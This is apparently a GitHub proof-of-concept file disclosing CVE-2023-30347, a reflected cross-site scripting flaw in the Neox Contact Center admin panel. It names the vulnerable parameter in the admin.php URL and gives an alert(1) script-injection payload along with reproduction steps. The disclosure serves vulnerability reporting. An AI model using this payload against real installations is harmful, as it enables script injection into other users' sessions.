CVE-2023-30347: CVE-2023-30347/poc.txt at main · huzefa2212/CVE-2023-30347

Reflected Cross-Site Scripting in Neox Contact Center.

Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

Steps to Reproduce :-

1. You need to login to Neox Contact Center as admin.

2. Visit the path https://neox.target.com/admin/admin.php?ADD=1&mode=serach&search_sms_api_name=Enter_Your_Payload_here

3. Payload "><script>alert(1)</script>

4. The PAyload will get executed.

Thank you for your visit